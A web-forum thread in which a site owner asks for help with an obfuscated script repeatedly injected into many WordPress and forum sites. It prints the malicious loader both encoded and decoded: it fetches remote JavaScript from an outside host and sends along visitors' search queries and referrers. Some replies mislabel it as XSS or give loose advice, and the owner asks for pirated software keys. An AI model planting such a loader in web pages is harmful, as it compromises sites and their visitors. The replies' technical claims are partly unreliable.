I have a number of sites and recently I have found this code within the header(top) of the site...of both wordpress sites and Forums ...SMF and vb.... the code seems to be injected within the wordpress "index.ini" files of each domains and also within 'showthread.php" of the forums... even after changing the "php" file after some time it is reinserted. can some please tell me how I can correct or fix this issue <script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> PHP: _________________ EXAMPLE http://www.iphone4gb.com
Well... I don't think this thread belongs in the PHP-forum, first and foremost. The script-tag contains the following code: if(!myik){ var r=document.referrer,u=document.URL,t="",q,que,se="gb"; if(r.indexOf("google.")!=-1){t="q";se="google";} if(r.indexOf("msn.")!=-1){t="q";se="msn";} if(r.indexOf("yahoo.")!=-1){t="p";se="yahoo";} if(r.indexOf("yandex.ru")!=-1){t="text";se="yandex.ru";} if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)){ que=r.substring(q+2+t.length).split("&")[0]; if ((que.indexOf('site:')==-1) && (que.toLowerCase().indexOf('www.')==-1)) document.write("<script src='http://best4you.if.ua/js/bidch.js?q="+que+"&ref="+r+"'></sc"+"ript>"); } } var myik=true; Code (markup): Although I don't really know what that code means, as I suck at Jscript. It should not be possible for the script-tag itself to "show up" on you pages, though, unless you have literally been hacked - ie. someone's gotten access to your FTP-servers. Of course, it could be something added by add-ons, plugins or the like - that I wouldn't know about.
Its XSS aka cross site scripting. There might be a vulnerability in your forum or wp. Try upgrading it. Also double check all your passwords.
"Try password protecting the administration section." Yes can you tell me more.... I do have a password on the ADMIN access.... I do have passwords on userid .... WHAT do you mean ... "protecting the administration section." what step by step would I have to do
I hate to say it but I have a few vb Nulled ... DGT.... however I have about 100 different sites... in WP, SMF, VB ...joomla... where do I start ???? please help I find myself changing the index.php...uploading a backup to correct the problem ... then the code is back in a few hours. ???? what to do ???
This is very RIGHT... It has migrated to many other subdomains.... How ...How do I end it ... stop it ... ??? htaccess, php.ini ???? what will stop ... should I delete the nulled forum ??? all other domains WP, SMF ... have the code >>> please help
Lock your domains ( public_html or domain sub-path ) by adding "password protected directory" ! While they are locked, you can start fixing your files ..
.. thanks for your suggestion....I have been stressed with this issue lock within the cpanel.... ... ----I FOUND it ... How do I find this cross site scripting.... how do I fix this issue with many sites... ??? can someone direct me to a new vb key or null I can replace with what I have. userID+gmail
Well, the easiest way would be to replace all files with the default ones ( from your backup ) ! Cross-site-scripting does not involve databases, so .. should not be too hard to do this step.
Brother I'm following your instructions. thanks so much for the advice. after complete.. what should be the next step. how do I remove the problem?....how do I isolate where the problem is ... I dont believe it is with the wordpress domains, 72 of them. where or how do this script get injected ??
Lately, many of 2.7 ( WP version ) blogs were hacked ! Check their ( WP ) forum - maybe there's some useful information available. Code can be injected wherever your script does not convert/check users messages/comments ( should display as a plain text, without possible code execution ). The one and only real option to avoid future hacking is to upgrade your blogs to the latest available version !